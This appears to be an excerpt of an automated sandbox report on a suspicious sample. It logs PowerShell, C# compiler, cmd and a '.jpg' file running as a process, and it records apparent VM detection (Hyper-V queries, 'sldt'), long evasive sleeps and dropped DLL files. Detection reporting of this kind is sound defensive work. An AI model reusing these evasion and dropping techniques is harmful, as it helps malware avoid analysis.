        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00435DBD sldt word ptr [eax]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2397
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4699
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5364
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2433
        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 589
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dllJump to dropped file
        Source: C:\Windows\System32\conhost.exe TID: 5924Thread sleep count: 56 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 2397 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 4699 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep count: 32 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984Thread sleep count: 48 > 30
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984Thread sleep time: -48000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 6356Thread sleep count: 59 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 1492Thread sleep count: 589 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 1492Thread sleep time: -7068000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_08354AE0 GetSystemInfo,
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapter
        Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: fOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1h
        Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterExtendedAcl
